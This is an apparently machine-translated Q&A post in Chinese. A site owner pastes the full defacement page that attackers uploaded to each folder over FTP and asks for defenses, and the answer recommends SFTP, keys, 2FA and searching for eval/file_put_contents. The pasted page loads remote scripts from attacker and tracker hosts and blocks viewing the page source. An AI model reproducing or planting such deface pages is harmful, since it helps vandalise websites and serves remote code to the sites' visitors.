这是一个严重的问题,我在其他人上传的FTP服务器上发现了HTML / PHP文件。我使用了强密码,但有人试图破解我的服务器。这发生在我身上两次。
HTML / PHP页面包含编写的代码"您的网站被黑了!"此页面上传到我服务器的每个文件夹中。我删除了这些文件并上传了我的备份,但是我们是否有任何安全代码,不允许任何人在FTP上注入文件,或者FTP的任何安全提示?
这里我正在编写HTML页面代码,该文件已上传到我的文件夹。
出于安全考虑,我需要帮助。
注意:请复制此代码并在您的本地浏览器上运行,这样您就可以了解相关信息。
谢谢和问候, 文达
<!--
, ,
/( )`
\ \___ / |
/- _ `-/ '
(/\/ \ \ /\
/ / | ` \
O O ) / |
`-^--'`< '
(_.) _ ) /
`.___/` /
`-----' /
<----. __ / __ \
<----|====O)))==) \) /====
<----' `--' `.__,' \
| |
\ /
______( (_ / \______
,' ,-----' | \
`--{__________) \/
root@0xaN0n:~# bash 0xaN0n.sh
~ <start>
~ Script by 0xaN0n | Garooda Security Squad
~ Mau copy?? Silahkan
~ Keep Support My Team [ Garooda Security Squad ]
~ https://www.facebook.com/groosec.go.id
~ https://0xaN0n.xyz
~ </start>
root@0xaN0n:~# poweroff
-->
<html>
<head>
<title>Hacked by OTnaytrue</title>
<link href='http://fonts.googleapis.com/css?family=Keania+One' rel='stylesheet' type='text/css'>
<link REL="SHORTCUT ICON" href="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png" />
<meta property="og:image" content="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png">
<meta content="OTnaytrue - Garooda Security Squad" name="description">
<meta content="Hacked by OTnaytrue" name="keywords">
<meta content="Hacked by OTnaytrue" name="keywords">
<meta content="Hacked by OTnaytrue" name="Abstract">
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKx%2fk%2f%2bUw0t0AH4no8FuNqZi9RYWWBQyQp0AHtS9VsumAX9UXmINwfamqfP%2bhBuKGBLUUYXicYjmM20YkqOwAdJtoE%2fcxyntKQyuef78x7ZyAufxf%2fOkm1Nd3J2AxD9NEpk%2bXHNkloX0VkcwNaQ3ob4ZiJdmouDyU0sPSjmnvjqC%2fKckHNj8n6eLy8IIIVVeZXvb9KSn%2blQdIwYra1LYGL3IeADYmd8A6Q7EDHQ5lXiiLjAJuuLlEYYgFWO4ePcQ0TONWgJAScS9jrRfCZp%2fIVRH7RzQb8zAZEjZjbRCnga%2fLZ2HDdgcWuhcFI5cpV5ya53ff3ebBBcFkk%2f7h46AW4Off4As9mJM0MAl%2fSFvgoxqQoipHdYLYkpq9aFVfDYpVd0bW4mG6VNsY5SgpLmsjOiG6syXGwKB5%2fTc%2fccCsvKOO%2fpZSnsyMYPXR6WiPVVebQs74v%2bC2UeVksLsErNCjJYCG7z362eknVYD9bhf5f4jFsgK4R79KrZs4PU%2fmgH5LB8%2fDLm9WMHHTUx6fSsJiNN4elM1ApjnAi" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
<style>
body {
background: transparent;
background: url(https://s23.postimg.org/za9vse2mj/IMG-20170525-_WA0009.jpg) no-repeat center center fixed;
background-attachment: fixed;
background-position: 50%;
background-repeat: no-repeat;
background-size: cover;
text-shadow: grey 0px 0px 10px;
height : auto;
width : 100%;
}
#kiri {
position: fixed;
width: auto;
left : 30px;
text-shadow: grey 0px 0px 10px;
text-decoration: none;
}
#kanan {
position: fixed;
float : right;
margin: 0 40px 40px 530px;
text-shadow: grey 0px 0px 10px;
}
.button {
margin-top:50px;
padding:10px;
background-color:red;
color:#FFF;
text-decoration: none;
}
.ntot {
font size:8px;
text-align: center;
font-family: Pirata One;
font-family: Keania One;
text-shadow: 4px 4px 50px #000000;
}
</style>
</head>
<body>
<div id="particles-js">
<center>
<div id=bar style="position: fixed; width: 100%; top: 0px; font-family: Tahoma; height: 20px; color: white; font-size: 13px; left: 0px; border-bottom: 2px solid darkred; padding: 0px; background-color: #000">
<b>
Garooda Security Squad - Eotnay@gmail.com
</b>
</div>
<br>
</center>
<div class="ntot">
<br><br><br><br><br>
<div id="kiri">
<center>
<a href="https://www.facebook.com/groosec.go.id"><img border="0" alt="0xaN0n" src="https://s28.postimg.org/n5r1hjerh/bqc_LRGO2.png" width="400" height="300"></a>
<br><br><br><br>
<a class="button" target="_blank" href="mailto:eotnay@gmail.com">Contact Me</a>
<a class="button" target="_blank" href="https://www.facebook.com/groosec.go.id"> Find Me </a>
</center>
</div>
<div id="kanan">
<br><br>
<center>
<font size="8" color="red">
"Be Secure SIR "
<br><br>
<font size="6" color="white">
OTnaytrue<font color="grey"> ft</font> Civilian
</font>
<br>
<font size="6" color="grey">
[ Garooda Security Squad ]
<br><br>
.: We Are :.
</font>
<br>
<font size="5" color="red">
_MisterNotFound_ | 0xaN0n | PandaKecil | Mr.R007 | Mr.Z_4202 | cyber_xr00t | <font color="grey">Civilian </font>|
Mr.404 | Mr.RequestTimeOut | Dull_1999 | D!@m@nt3 | ins7ing | SyntaX404 | Mr.DarkNight |
Rabbids404 | Mr.PHP404ERROR | <font color="grey">OTnaytrue</font> | AFK404 | MKNotfound477 | ./St4rXr4tS | GunshootCbr | HeartBeat
</font>
</center>
</div>
<DIV style="DISPLAY: none">
<AUDIO controls="controls" autoplay="autoplay" loop="loop">
<SOURCE type="audio/mpeg" src="http://www.topas-tv.com/config/skillet.mp3">
</AUDIO>
</DIV>
</div>
<script src="https://0xan0n.xyz/non/js/particles.js"></script>
<script src="https://0xan0n.xyz/non/js/app.js"></script>
</body>
<footer>
<center>
<div id=bar style="position: fixed; width: 100%; bottom: 0px; font-family: Tahoma; height: 20px; color: white; font-size: 13px; left: 0px; border-top: 2px solid darkred; padding: 0px; background-color: #000">
<b>
Greetz : [ <marquee behavior="alternate" width="59%"><font color="red">Kakatoji - ./bl4ckj4ck - Gadjah Mada - PURPLESM0KE - BerdendangC0de - 0xd3vs - IndoXploit - Kedaong Crew - TKJ Cyber Art - Clown Hacktivism Team - Indonesia Defacer Tersakiti Team - Bima Cyber Team - T1KUS90T - IDCA - Garuda Security Hacker - And All Indonesian Defacer</font></marquee>]
</b>
</div>
</center>
</div>
</footer>
<!--[0xTrueCode-Brown anti copass Click kanan :V]--!>
<script language=JavaScript>
var message="Ooops.. OTnaytrue Was Here";
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
</script>
<script type='text/javascript'>
//<![CDATA[
shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://web.facebook.com/OTnaytrue"});
//]]>
</script>
</html>
答案 0 :(得分:0)
首先,您不应使用FTP,而应使用SFTP或至少使用FTPS。使用FTP,您的登录名和密码将通过网络以纯文本形式传输,供所有人查看。我相信您的提供商必须提供上述任一选项,如果没有,请将您的网站移至其他地方。
删除所有现有访问权限并使用强密码创建新访问权限。如果可以,请尝试使用公钥/私钥而不是密码进行ssh身份验证。
在您的托管帐户中,您可以设置2因素身份验证。如果可以,请做。
然后,就代码而言,请查找关键字eval,file_put_contents,fputs等。